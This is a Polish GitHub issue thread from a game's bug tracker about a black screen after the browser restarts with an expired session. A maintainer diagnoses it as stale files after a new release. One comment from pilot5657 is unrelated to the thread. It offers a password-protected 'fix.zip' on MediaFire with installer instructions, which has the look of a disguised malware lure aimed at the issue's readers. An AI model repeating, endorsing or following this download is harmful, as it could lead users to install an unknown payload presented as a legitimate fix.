### ISSUE TITLE
[BUG]Czarny ekran po zamknięciu przeglądarki i powrocie rano

### ISSUE THREAD

**Issue by FrikkaFre** [Kroniki-Fallathanu/hexah-bugtrack#67]
**Opisz błąd**
https://beta.kf2.pl/game/conversation

**Kroki do odtworzenia**
1.Zostaw kartę przeglądarki na liście rozmów
2. Wyłącz przeglądarkę
3. Pójdź spać (albo zapewne poczekaj aż się token przedawni)
4. Włącz przeglądarkę startując ją na otwartych ostatnio kartach

**Screenshots**
![hgf](https://github.com/user-attachments/assets/382a6758-a44d-46bf-811d-3428c8ecf77f)

**Twoje środowisko:**
 - System operacyjny: Windows 11
 - Przeglądarka Brave

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thoranrion** [comment]
Przydałaby się zrzutka z konsoli pod f12.

**Comment by thoranrion** [comment]
Ideolo

**Comment by thoranrion** [comment]
Ok, czyli jest to związane z wydaniem nowej wersji aplikacji, trzeba odświeżyć stronę aby zaciągnęły się nowe pliki.
